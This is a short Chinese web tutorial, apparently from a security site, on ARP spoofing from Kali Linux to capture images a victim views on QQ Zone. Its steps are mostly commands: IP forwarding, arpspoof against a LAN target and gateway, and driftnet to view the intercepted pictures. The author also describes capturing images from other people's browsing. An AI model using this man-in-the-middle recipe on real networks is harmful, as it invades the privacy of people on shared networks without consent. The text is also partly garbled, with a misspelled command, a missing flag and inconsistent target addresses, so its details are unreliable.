首页 > 安全 > 网络安全 >

ARP欺骗技术-获取内网目标IP访问QQ空间的图片

2016-01-16

文章只供学习研究,请勿触犯法律问题要求:虚拟机Kali linux系统命令查ip命令:ifconfigecho写命令是不回显driftnet 获取本机网卡》网卡》查看网卡的图片信息例如攻击目标ip:192 168 1 100 网关:192 168 1

文章只供学习研究,请勿触犯法律问题

要求:虚拟机Kali linux系统
命令“查ip命令:ifconfigecho写命令是不回显driftnet 获取本机网卡》网卡》查看网卡的图片信息例如攻击目标ip:192.168.1.100 网关:192.168.1.1
欺骗语句“Arpspoof -i 网卡 -t 目标ip 网关例如:arpsp00f -i eth0 192.168.1.100 192.168.1.1
以下两句请理解:Arp 欺骗目标ip 流量经过我的网卡,从网卡关出去Arp断网目标ip流量经过我的网卡
第一步“开启ip转发”命令:echo 1 > /proc/sys/net/ipv4/ip_forward (回车没有任何的返回)
\
第二步“开始欺骗”命令:arpspoof -i eth0 -t 192.168.1.108 192.168.1.1 (回车之后不断欺骗运行中~~~[记得这个窗口需要保留])
\
第三步“查看目标的图片信息”弹出的窗口请不要关闭,在窗口就可以看到获取信息。命令:driftnet -i eth0

第四步我在逛一下别人的空间获取到的图片。
\

相关文章
最新文章
热点推荐